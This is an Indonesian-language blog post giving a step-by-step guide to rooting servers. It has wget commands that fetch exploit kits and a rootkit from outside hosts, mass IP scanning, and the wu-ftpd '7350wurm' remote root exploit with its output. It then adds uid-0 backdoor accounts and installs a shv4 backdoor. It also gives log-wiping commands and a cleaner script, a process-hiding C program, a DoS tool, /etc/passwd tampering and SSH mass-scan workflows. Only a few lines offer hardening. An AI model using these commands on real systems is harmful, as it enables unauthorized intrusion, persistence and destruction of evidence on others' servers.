SEMUANYA BERAWAL DARI MIMPI

Cara Hacking Root Server

Tips:
mkdir .bash            <----untuk membuat direktori bash
cd .bash                 <---untuk masuk ke direktori bash

mkdir <direktory>  <--- untuk membuat direktory baru

cd <direktory>       <--- untuk masuk ke direktory yg anda mau

cd /                        <--- untuk keluar dari suatu direktory

rm -rf  <file>          <--- untuk menghapus file/direktory

 

1. Tahap Pertama

 

Cara instalasi Xpost dan ftp
wget http://cyberborneo.b0x.com/xpost.tgz

wget http://cyberborneo.b0x.com/ftp.tgz
tar -zxvf xpost.tgz

tar -zxvf ftp.tgz

 

======================================================

 

2. Tahap Kedua

 

cd xpost
cd xwurm/
./scan 213.124

setelah dapat wu-scan.log
./masswu wu-scan.log

 

Setelah didapat pesan sebagai berikut

Trying get root 213.124.151.113 ...
SUCCESS, YOU HAVE ROOT IN 213.124.151.113 ...
Logged in log-root ...

 

Itu berarti anda telah dapat akses root di IP 213.124.151.113

 

======================================================

 

3. Tahap Ketiga

Buka new sessiom dari putty ssh anda, login kembali ke shell anda

masuk ke direktory ftp anda

 

cd ftp
./awu 213.124.151.113 ( ip nya)

apabila anda sukses mendapat akses root nya maka akan keluar pesan sbb:

 

7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2) 
team teso (thx bnuts, tomas, synnergy.net !). 

# trying to log into 213.124.151.113 with (ftp/mozilla@) ... connected. 
# banner: 220 db-depot01 FTP server (Version wu-2.6.1-16) ready. 
# successfully selected target from banner 

### TARGET: RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm] 

# 1. filling memory gaps 
# 2. sending bigbuf + fakechunk 
building chunk: ([0x0807314c] = 0x08085f98) in 238 bytes 
# 3. triggering free(globlist[1]) 
# 
# exploitation succeeded. sending real shellcode 
# sending setreuid/chroot/execve shellcode 
# spawning shell 
############################################################################ 

uid=0(root) gid=0(root) groups=50(ftp) 
Linux db-depot01 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknown

 

whoami

root <-- berarti anda sedang dalam akses root

 

======================================================

 

4. Tahap Keempat

 

Add  login akses root anda
--------------------------------------------------------------

1. Cara I (bukan utk redhat 7.2)
/usr/sbin/useradd rampok -u 0 -d /

passwd -d rampok
passwd rampok

su rampok <<--------untuk super user
 

2. Cara II

kalo mau dapet acces root ketik :

/usr/sbin/useradd crit -u 0 g- 0 -d /etc/crit
abis itu ketik lagi
passwd crit

wuasu666

 

Kemudian Add User untuk login shell anda

/usr/sbin/adduser html -g wheel -s /bin/bash -d /etc/html
passwd html
fuck666 2X

 

=======================================================

 

5. Tahap Kelima

Pasang backdor ke shell baru anda guna menjaga kemungkinan yg tidak di inginkan


wget www.utay-doyan.cc/shv4.tar.gz
tar -zxvf shv4.tar.gz
cd shv4
./setup pass yang dimau port yang dimau

contoh : --> ./setup wuasu 7000
cd /

 

wget http://cyberborneo.b0x.com/cleaner.tgz
tar -zxvf cleaner.tgz
cd cleaner
./install

 

Jangan lupa untuk menghapus file backdor anda tadi untuk menghapus jejak

rm -rf  cleaner.tgz

rm -rf  shv4.tar.gz

 

===========================================

 

6. Tahap Keenam

Hapus jejak ngeroot anda ketik perintah berikut:


rm -f /.bash_history /root/.bash_history /var/log/messages
ln -s /devory
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
rm -rf /var/log/lastlog
cat > /var/log/lastlog
ctrl d

 

SELESAI.....

 

============================================================

 

Satu tips buat menghacurkan shell anda yang rusak ato sudah dihapus password loginnya

oleh admin, dengan catatan anda masih berada dalam shell itu juga, yaitu:

 

wget http://cyberborneo.b0x.com/xzibit.tar.gz

tar -zxvf xzibit.tar.gz

cd lamerk
./install

cd /

rm -rf lamerk xzibit.tar.gz

 

============================================================

 

Beberapa Link Yang bagus buat program2 eksploit, DDOS, Sniffing, Security Tools etc....

 

http://www.angelfire.com/de2/sirex3/linux.html
http://www.megspace.com/internet/wet/linux.html
http://www.s0ftpj.org/en/tools.html
http://web.textfiles.com/hacking/
http://www.honeynet.org/scans/
http://www.honeynet.org/scans/scan15/som/som30.txt
http://www.yolinux.com/TUTORIALS/LinuxSecurityTools.html
http://www.attrition.org/mirror/attrition/2000-07.html/
http://www.sans.org/rr/infowar/hacktivism2.php
http://www.antihackertoolkit.com/tools.html
http://www.hackinglinux.co.uk/
http://www.virtro.de/now_inhalt.html
http://packetstormsecurity.nl/misc.html
http://www.ariska.net/
http://www.valisie.com/Vali/

 

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

 

obat tembak.c >>echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all
# Disables packet forwarding
net.ipv4.ip_forward = 0
# Enables source route verification
net.ipv4.conf.all.rp_filter = 1
# Disables automatic defragmentation (needed for masquerading, LVS)
net.ipv4.ip_always_defrag = 1
# Disables the magic-sysrq key
kernel.sysrq = 0
you can get sample for "blockping.tar.gz" just extract and move them to /usr/bin/


+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

 

***Jalanin Tembak.c***

./fake bash ./tembak zipey.net 53 (Pake Hidder tanpa Login Root)

./tembak ipaddress 53 atau ./tembak zipey.com 53

./tembak zipey.com 53 -->> artinya nembak zipey.com lewat port 53

(ditembak port 53 nya pasti mati)

./fake proses_asli proses_palsu

./fake httpd ./teso -h 202.202.202.202

./fake -bash ./bnc bnc.conf

./fake pico ./eggdrop -m FroGStoNe

 

 

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

 

 

* Fake Background Buatan buDZ
Greetz to : fabianclone,EF73 and all #betalmostdone and #antihackerlink

/* [ilang.c] File Paling Oke Untuk Menghilangkan BackGround unTuk Eggdrop Dan BnC. [http://members.tripod.com/alltoolkit] woRdz: d0n't cHangE beL0w thIs liNe , pRivatE stfU CrEatEd bY buDZ <mYnAmE@bOeDi.NeT> */

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <sys/types.h>
char fake[1000]; int main(int argc,char **argv) { if(argc < 3) { exit(0); }
strcpy(fake,argv[1]);strcat(fake,
" "
" " 
" ");
execl(argv[2],fake,argv[3],argv[4],argv[5],argv[6],argv[7],argv[8],NULL);
exit(0);}



+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

 

***Hide BG procces***
gcc -o namafile undo1.c
chmod +x namafile
./undo httpd ./eggdrop -m eggdrop.conf

 

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

 

***Wipe Login User***
(ngejalaninnya pake login Root)
upload wipe ke dir-user
chmod +x wipe
./wipe u username
./wipe l username
./wipe w username

 

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

 

#!/bin/sh

clear

echo "log CLEANING SERVICE - rahul-x"

echo " "

echo "bersih... bersih... "

echo "Removing Files....."

echo " "

rm -f ~root/.bash_history

rm -f /var/log/lastlog

rm -f /var/log/netconf.log

rm -f /var/log/boot.log

rm -f /var/log/messages

rm -f /var/log/secure

rm -f /var/log/xferlog

echo "Creating Files......"

echo " "

touch ~root/.bash_history

touch /var/log/lastlog

touch /var/log/netconf.log

touch /var/log/boot.log

touch /var/log/messages

touch /var/log/secure

touch /var/log/xferlog

echo "Change Mode Files..."

echo " "

chmod 0664 ~root/.bash_history

chmod 0664 /var/log/lastlog

chmod 0664 /var/log/netconf.log

chmod 0664 /var/log/boot.log

chmod 0664 /var/log/messages

chmod 0664 /var/log/secure

chmod 0664 /var/log/xferlog

echo " "

echo "riped riped riped by rahul-x : ... "

echo " viva indonesia "

echo " "

 

Menutup hole pada samba terhadap serangan sambal.c Untuk mengatasi hal tersebut, ada satu teknik yang sangat gampang. Yaitu dengan melakukan editing pada file smb.conf Anda cukup mencari bagian ---------------- [netlogon] comment = Network Logon Service path = /usr/local/samba/lib/netlogon guest ok = yes writable = no share modes = no ---------------- Terus ubah bagian guest ok = yes menjadi guest ok = no Selanjutnya matikan samba nya dengan command /etc/init.d/smb stop untuk menon-aktifkan configurasi samba yang aktif. Kemudian hidupkan kembali dengan commmand /etc/init.d/smb start untuk menjalankan configurasi yang baru. Dengan melakukan perubahan tersebut, coba anda lakukan exploitasi lagi +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ cat /etc/passwd copy-paste ke notepad cari yg ada akhiran bash <<= bisa di jadikan root lagi liat yg ada numeric => :x::255::255: ganti yg di tangah jadi 0 trus you ingatin user nya yg kamu ganti jadi 0 itu apa cat > /etc/passwd enter trus paste lagi trus tekan control D trus tekan control c liat berhasil ga berubah ga 255 itu jadi 0 passwd user <<= ingat tadi apa nama user yg kamu ganti 255 nya jadi 0 trus klo udah login su langsung ke cd /lib/security bikin direkc pam_res.so cd pam_res.so wget cleaner disana dalam pam_res.so ga boleh selain root harus you ganti usernya name nya jadi root +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ openBSD: wget http://packetstorm.decepticons.org/crypt/ssh/openssh/openssh-3.4p1.tar.gz tar -zxvf openssh-3.4p1.tar.gz wget www.renjana.com/sshutup-theo.tar.gz tar -zxvf sshutup-theo.tar.gz ls -al sshutuptheo cd openssh-3.4p1 patch < ssh.diff ./configure make ssh ./ssh -l root IP co: ./ssh -l root shah.koptevo.net http://www.netcraft.com/whats/?host=www.t-mems.com.tw +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ngeROOT ssh LINUX port 22: wget http://packetstormsecurity.org/groups/teso/grabbb-0.1.0.tar.gz tar -zxvf grabbb-0.1.0.tar.gz.tar.gz gcc -o grabbb grabbb.c cd grabbb ./grabbb -a IP -b IP port co:./grabbb -a 202.1.1.1 -b 202.1.1.1 22 66.201.243.210 wget www.suckmyass.org/ssh-scan8.tar.gz tar cd ssh-scan8 ./r00t 203.20 -d 4 <--- scan massal SSH ./r00t 203.20 -d 2 <--- scan massal FTP ./r00t 203.20 -d 3 <--- scan massal FTP ./r00t 134.7. -d 4 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ngROOT pake massaphace: ./massossl 200 443 160 artinya scan ip 200.160 port 443 port 443 jangan diganti, kecuali ip boleh dari ip 1 - 254 kecuali ip 192.x.x.x lawan 10.x.x.x kada kawa discan, soalnya ip intranet

No comments:

Post a Comment